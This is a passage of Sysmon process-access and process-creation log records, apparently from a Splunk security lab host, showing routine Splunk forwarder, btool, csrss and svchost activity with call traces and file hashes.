C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.417","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3746,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.604\r\nSourceProcessGUID: {E2A3D6B1-1105-5F25-0000-00108A960500}\r\nSourceProcessId: 1092\r\nSourceThreadId: 4788\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.604","SourceProcessGUID":"{E2A3D6B1-1105-5F25-0000-00108A960500}","SourceProcessId":"1092","SourceThreadId":"4788","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3747,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.656\r\nProcessGuid: {E2A3D6B1-1105-5F25-0000-00102F9A0500}\r\nProcessId: 4780\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-regex --log-warnings\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {E2A3D6B1-1104-5F25-0000-0010B08A0500}\r\nParentProcessId: 3828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.656","ProcessGuid":"{E2A3D6B1-1105-5F25-0000-00102F9A0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-regex --log-warnings","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{E2A3D6B1-1104-5F25-0000-0010B08A0500}","ParentProcessId":"3828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3748,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.651\r\nSourceProcessGUID: {E2A3D6B1-1104-5F25-0000-0010B08A0500}\r\nSourceProcessId: 3828\r\nSourceThreadId: 3824\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {E2A3D6B1-10F1-5F25-0000-001095480500}\r\nTargetProcessId: 4780\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+181c6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.651","SourceProcessGUID":"{E2A3D6B1-1104-5F25-0000-0010B08A0500}","SourceProcessId":"3828","SourceThreadId":"3824","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{E2A3D6B1-10F1-5F25-0000-001095480500}","TargetProcessId":"4780","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+181c6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3749,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.651\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-10F1-5F25-0000-001095480500}\r\nTargetProcessId: 4780\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.651","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-10F1-5F25-0000-001095480500}","TargetProcessId":"4780","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3750,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.651\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.651","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3751,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.651\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.651","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3752,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.651\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.651","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3753,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.651\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 